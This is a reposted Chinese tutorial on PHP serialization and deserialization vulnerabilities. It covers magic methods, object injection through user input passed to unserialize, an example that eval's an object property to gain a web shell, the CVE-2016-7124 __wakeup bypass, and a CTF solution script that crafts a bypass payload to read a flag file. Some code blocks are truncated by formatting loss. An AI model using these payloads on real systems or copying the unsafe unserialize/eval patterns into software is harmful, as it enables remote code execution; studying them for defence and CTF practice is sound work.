您现在的位置是:群英 > 开发技术 > PHP语言
PHP中反序列化怎样理解?一文带你看懂
Admin发表于 2021-11-10 15:32:571281 次浏览

    这篇文章给大家分享的是PHP中反序列化,一些朋友可能对于PHP中反序列化还不是很了解,本文是小编复习了之前的内容,对PHP反序列化理解的总结,下文总结比较详细,有需要的也可以参考了解看看。

     serialize()函数

     “所有php里面的值都可以使用函数serialize()来返回一个包含字节流的字符串来表示。序列化一个对象将会保存对象的所有变量,但是不会保存对象的方法,只会保存类的名字。”

    一开始看这个概念可能有些懵,但之后也是慢慢理解了

    在程序执行结束时,内存数据便会立即销毁,变量所储存的数据便是内存数据,而文件、数据库是“持久数据”,因此PHP序列化就是将内存的变量数据“保存”到文件中的持久数据的过程。

 $s = serialize($变量); //该函数将变量数据进行序列化转换为字符串
 file_put_contents(‘./目标文本文件', $s); //将$s保存到指定文件

    下面通过一个具体的例子来了解一下序列化:

name.'is'.$this->age.'years old. 
';
  }
}
//创建一个对象
$user = new User();
// 设置数据
$user->age = 20;
$user->name = 'daye';

//输出数据
$user->PrintData();
//输出序列化之后的数据
echo serialize($user);

?>

    这个是结果:

    可以看到序列化一个对象后将会保存对象的所有变量,并且发现序列化后的结果都有一个字符,这些字符都是以下字母的缩写。

a - array         b - boolean
d - double         i - integer
o - common object     r - reference
s - string         C - custom object
O - class         N - null
R - pointer reference   U - unicode string

    了解了缩写的类型字母,便可以得到PHP序列化格式

O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"daye";}
对象类型:长度:"类名":类中变量的个数:{类型:长度:"值";类型:长度:"值";......}

    通过以上例子,便可以理解了概念中的通过serialize()函数返回一个包含字节流的字符串这一段话。

     unserialize()函数

    unserialize()对单一的已序列化的变量进行操作,将其转换回 PHP 的值。在解序列化一个对象前,这个对象的类必须在解序列化之前定义。 

    简单来理解起来就算将序列化过存储到文件中的数据,恢复到程序代码的变量表示形式的过程,恢复到变量序列化之前的结果。

 $s = file_get_contents(‘./目标文本文件'); //取得文本文件的内容(之前序列化过的字符串)
 $变量 = unserialize($s); //将该文本内容,反序列化到指定的变量中

    通过一个例子来了解反序列化:

name.' is '.$this->age.' years old. 
';
  }
}
//重建对象
$user = unserialize('O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"daye";}');

$user->PrintData();

?>

    这个是结果:

    注意:在解序列化一个对象前,这个对象的类必须在解序列化之前定义。否则会报错

    PHP反序列化漏洞

    在学习漏洞前,先来了解一下PHP魔法函数,对接下来的学习会很有帮助

    PHP 将所有以 __(两个下划线)开头的类方法保留为魔术方法

__construct  当一个对象创建时被调用,
__destruct  当一个对象销毁时被调用,
__toString  当一个对象被当作一个字符串被调用。
__wakeup()  使用unserialize时触发
__sleep()  使用serialize时触发
__destruct()  对象被销毁时触发
__call()  在对象上下文中调用不可访问的方法时触发
__callStatic()  在静态上下文中调用不可访问的方法时触发
__get()  用于从不可访问的属性读取数据
__set()  用于将数据写入不可访问的属性
__isset()  在不可访问的属性上调用isset()或empty()触发
__unset()   在不可访问的属性上使用unset()时触发
__toString()  把类当作字符串使用时触发,返回值需要为字符串
__invoke()  当脚本尝试将对象调用为函数时触发

    这里只列出了一部分的魔法函数,具体可见

    https://www.php.net/manual/zh/language.oop5.magic.php

    下面通过一个例子来了解一下魔法函数被自动调用的过程

varr1."
";
 }
 public function __construct(){
 echo "__construct
";
 }
 public function __destruct(){
 echo "__destruct
";
 }
 public function __toString(){
 return "__toString
";
 }
 public function __sleep(){
 echo "__sleep
";
 return array('varr1','varr2');
 }
 public function __wakeup(){
 echo "__wakeup
";
 }
}

$obj = new test(); //实例化对象,调用__construct()方法,输出__construct
$obj->echoP();  //调用echoP()方法,输出"abc"
echo $obj;  //obj对象被当做字符串输出,调用__toString()方法,输出__toString
$s =serialize($obj); //obj对象被序列化,调用__sleep()方法,输出__sleep
echo unserialize($s); //$s首先会被反序列化,会调用__wake()方法,被反序列化出来的对象又被当做字符串,就会调用_toString()方法。
// 脚本结束又会调用__destruct()方法,输出__destruct
?>

    这个是结果:

    通过这个例子就可以清晰的看到魔法函数在符合相应的条件时便会被调用。

    对象注入

    当用户的请求在传给反序列化函数unserialize()之前没有被正确的过滤时就会产生漏洞。因为PHP允许对象序列化,攻击者就可以提交特定的序列化的字符串给一个具有该漏洞的unserialize函数,最终导致一个在该应用范围内的任意PHP对象注入。

    对象漏洞出现得满足两个前提:

       一、unserialize的参数可控。 

       二、 代码里有定义一个含有魔术方法的类,并且该方法里出现一些使用类成员变量作为参数的存在安全问题的函数。
    下面来举个例子:

test;
  }
}
$a = $_GET['test'];
$a_unser = unserialize($a);
?>

    比如这个列子,直接是用户生成的内容传递给unserialize()函数,那就可以构造这样的语句

?test=O:1:"A":1:{s:4:"test";s:5:"lemon";}

    在脚本运行结束后便会调用_destruct函数,同时会覆盖test变量输出lemon。

    发现这个漏洞,便可以利用这个漏洞点控制输入变量,拼接成一个序列化对象。

    再看一个例子:

test);//_destruct()函数中调用eval执行序列化对象中的语句
  }
}
$test = $_POST['test'];
$len = strlen($test)+1;
$pp = "O:1:\"A\":1:{s:4:\"test\";s:".$len.":\"".$test.";\";}"; // 构造序列化对象
$test_unser = unserialize($pp); // 反序列化同时触发_destruct函数
?>

    其实仔细观察就会发现,其实我们手动构造序列化对象就是为了unserialize()函数能够触发__destruc()函数,然后执行在__destruc()函数里恶意的语句。

    所以我们利用这个漏洞点便可以获取web shell了

    绕过魔法函数的反序列化

    wakeup()魔法函数绕过

PHP5<5.6.25 PHP7<7.0.10

    PHP反序列化漏洞CVE-2016-7124

    #a#重点:当反序列化字符串中,表示属性个数的值大于真实属性个数时,会绕过 __wakeup 函数的执行

    百度杯――Hash

    其实仔细分析代码,只要我们能绕过两点即可得到f15g_1s_here.php的内容

    (1)绕过正则表达式对变量的检查
    (2)绕过_wakeup()魔法函数,因为如果我们反序列化的不是Gu3ss_m3_h2h2.php,这个魔法函数在反序列化时会触发并强制转成Gu3ss_m3_h2h2.php

    那么问题就来了,如果绕过正则表达式
    (1)/[oc]:\d+:/i,例如:o:4:这样就会被匹配到,而绕过也很简单,只需加上一个+,这个正则表达式即匹配不到0:+4:

    (2)绕过_wakeup()魔法函数,上面提到了当反序列化字符串中,表示属性个数的值大于真实属性个数时,会绕过 _wakeup 函数的执行

    编写php序列化脚本

file = $file;
  }

  function __destruct() {
    echo @highlight_file($this->file, true);
  }

  function __wakeup() {
    if ($this->file != 'Gu3ss_m3_h2h2.php') {
      //the secret is in the f15g_1s_here.php
      $this->file = 'Gu3ss_m3_h2h2.php';
    }
  }
}
#先创建一个对象,自动调用__construct魔法函数
$obj = new Demo('f15g_1s_here.php');
#进行序列化
$a = serialize($obj);
#使用str_replace() 函数进行替换,来绕过正则表达式的检查
$a = str_replace('O:4:','O:+4:',$a);
#使用str_replace() 函数进行替换,来绕过__wakeup()魔法函数
$a = str_replace(':1:',':2:',$a);
#再进行base64编码
echo base64_encode($a);
?>

    以上就是PHP中反序列化的相关介绍,上述的示例具对大家理解PHP中反序列化有一定的帮助,需要的朋友可以参考。最后,想要了解更多可以继续浏览群英网络其他相关的文章。

文本转载自脚本之家

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:mmqy2019@163.com进行举报,并提供相关证据,查实之后,将立刻删除涉嫌侵权内容。

标签: php反序列化
)
相关信息推荐
2021-11-12 18:02:43 
摘要:这篇文章给大家分享的是PHP怎样做重定向页面跳转的方法,小编觉得挺实用的,因此分享给大家做个参考,下文介绍了三种实现方法,而且示例代码介绍的非常详细,感兴趣的朋友接下来一起跟随小编看看吧。
2022-05-26 17:51:01 
摘要:下面由golang教程栏目给大家介绍Golang在各平台下交叉编译,希望对需要的朋友有所帮助!Golang 支持交叉编译,在一个平台上生成另一个平台的可执行程序,最近使用了一下,非常好用,这里备忘一下。
2022-05-28 17:11:14 
摘要:java程序的运行环境简称为JRE。JRE全称Java Runtime Environment,中文意思为Java运行环境,是一个软件,由太阳微系统所研发,JRE可以让计算机系统运行Java应用程序。
云活动
推荐内容
热门关键词
热门信息
群英网络助力开启安全的云计算之旅
立即注册,领取新人大礼包
  • 联系我们
  • 24小时售后:4006784567
  • 24小时TEL :0668-2555666
  • 售前咨询TEL:400-678-4567

  • 官方微信

    官方微信
Copyright  ©  QY  Network  Company  Ltd. All  Rights  Reserved. 2003-2019  群英网络  版权所有   茂名市群英网络有限公司
增值电信经营许可证 : B1.B2-20140078   粤ICP备09006778号
免费拨打  400-678-4567
免费拨打  400-678-4567 免费拨打 400-678-4567 或 0668-2555555
微信公众号
返回顶部
返回顶部 返回顶部